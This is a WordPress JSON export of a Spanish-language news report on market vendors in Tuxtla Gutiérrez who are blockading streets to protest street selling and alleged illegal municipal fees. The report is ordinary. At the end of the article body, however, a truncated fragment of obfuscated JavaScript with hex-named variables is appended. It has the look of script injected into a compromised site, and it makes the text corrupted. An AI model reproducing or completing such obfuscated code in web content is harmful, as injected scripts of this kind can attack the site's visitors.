{"id":25587,"date":"2025-12-04T01:49:43","date_gmt":"2025-12-04T01:49:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25587"},"modified":"2025-12-04T01:49:44","modified_gmt":"2025-12-04T01:49:44","slug":"5-mil-ambulantes-han-bajado-en-un-70-las-ventas-en-mercados-tradicionales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25587","title":{"rendered":"5 mil ambulantes han bajado en un 70% las ventas en mercados tradicionales"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"25588\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472426-1024x576.jpg\" alt=\"\" class=\"wp-image-25588\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472426-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472426-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472426-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472426.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"25589\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472430-1024x576.jpg\" alt=\"\" class=\"wp-image-25589\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472430-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472430-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472430-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472430.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"25590\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472423-1024x576.jpg\" alt=\"\" class=\"wp-image-25590\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472423-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472423-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472423-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000472423.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>3 de diciembre del 2025. Desde la ma\u00f1ana de este mi\u00e9rcoles, decenas de locatarios de los mercados Juan Sabines y Pascacio Gamboa realizaron un bloqueo y se instalaron a vender en la v\u00eda p\u00fablica del centro de Tuxtla Guti\u00e9rrez, en protesta por la proliferaci\u00f3n descontrolada del comercio informal y la &#8220;omisi\u00f3n e indiferencia&#8221; de las autoridades municipales frente a esta problem\u00e1tica.<\/p>\n\n\n\n<p>La protesta, encabezada por peque\u00f1os comerciantes formales, tuvo como consigna principal: &#8220;Las calles y banquetas del centro no se venden, reubicaci\u00f3n del Comercio Informal&#8221;. Los manifestantes denunciaron que sus ventas al interior de los mercados tradicionales han ca\u00eddo hasta en un 70% en los \u00faltimos a\u00f1os, un declive que atribuyen directamente al crecimiento exponencial e invasivo del ambulantaje en el primer cuadro de la ciudad.<\/p>\n\n\n\n<p>M\u00e1s de cinco mil ambulantes, muchos extranjeros<\/p>\n\n\n\n<p>De acuerdo con testimonios recabados en el lugar, en los \u00faltimos a\u00f1os se ha disparado el n\u00famero de vendedores informales en el centro de Tuxtla, superando los cinco mil puestos que ocupan calles, avenidas y banquetas. Los locatarios se\u00f1alaron que, en este momento, una mayor\u00eda de estos vendedores son de nacionalidad extranjera, particularmente de Centroam\u00e9rica y el Caribe.<\/p>\n\n\n\n<p>Entre los productos que se ofrecen en la v\u00eda p\u00fablica, de manera irregular, destacan ropa, carnes sin refrigeraci\u00f3n, frutas, electrodom\u00e9sticos y una amplia variedad de mercanc\u00edas, las cuales, seg\u00fan los comerciantes establecidos, se venden en condiciones de inequidad y sin cumplir normas sanitarias o fiscales.<\/p>\n\n\n\n<p>Acusan complicidad municipal con cobros ilegales<\/p>\n\n\n\n<p>La denuncia m\u00e1s grave de los locatarios apunta hacia una presunta complicidad del Ayuntamiento de Tuxtla Guti\u00e9rrez. Afirman que autoridades municipales o elementos que se identifican como tales cobran entre 200 y 400 pesos por d\u00eda a los vendedores informales por ocupar espacios en las banquetas, dependiendo de la ubicaci\u00f3n, en un esquema de renta ilegal del espacio p\u00fablico que perpet\u00faa el problema.<\/p>\n\n\n\n<p>&#8220;Nosotros pagamos impuestos, luz, agua, renta y permisos. Ellos (los ambulantes) invaden y, seg\u00fan nos consta, hasta les cobra el mismo ayuntamiento por estar ah\u00ed, sin darles factura ni orden. Es un doble discurso que nos est\u00e1 matando&#8221;, declar\u00f3 uno de los locatarios que prefiri\u00f3 omitir su nombre.<\/p>\n\n\n\n<p>Mercados tradicionales &#8220;en agon\u00eda&#8221;<\/p>\n\n\n\n<p>Los manifestantes describieron una situaci\u00f3n de emergencia para los mercados hist\u00f3ricos de la ciudad, los cuales &#8220;agonizan&#8221; no solo por la competencia desleal, sino tambi\u00e9n por el abandono en mantenimiento, la inseguridad y la falta de una estrategia integral para revitalizarlos por parte de las autoridades.<\/p>\n\n\n\n<p>El bloqueo, que gener\u00f3 afectaciones viales en el centro de la capital chiapaneca, se mantuvo como una medida de presi\u00f3n para exigir a las autoridades municipales y estatales un operativo real de reordenamiento, la aplicaci\u00f3n de los reglamentos de comercio en la v\u00eda p\u00fablica y un di\u00e1logo urgente para buscar soluciones que salven la econom\u00eda de cientos de familias que dependen de los mercados formales.<\/p>\n\n\n\n<p>Hasta el momento, el Ayuntamiento de Tuxtla Guti\u00e9rrez no se ha pronunciado oficialmente sobre las acusaciones de cobro ilegal ni ha anunciado acciones concretas para atender el conflicto.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 3 de diciembre del 2025. Desde la ma\u00f1ana de este mi\u00e9rcoles, decenas de locatarios de los mercados Juan Sabines y Pascacio Gamboa realizaron un bloqueo y se instalaron a vender en la v\u00eda p\u00fablica del centro de Tuxtla Guti\u00e9rrez, en protesta por la proliferaci\u00f3n descontrolada del comercio informal y la &#8220;omisi\u00f3n e indiferencia&#8221; &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25589,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25587","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25587","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25587"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25587\/revisions"}],"predecessor-version":[{"id":25591,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25587\/revisions\/25591"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25589"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25587"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25587"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25587"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}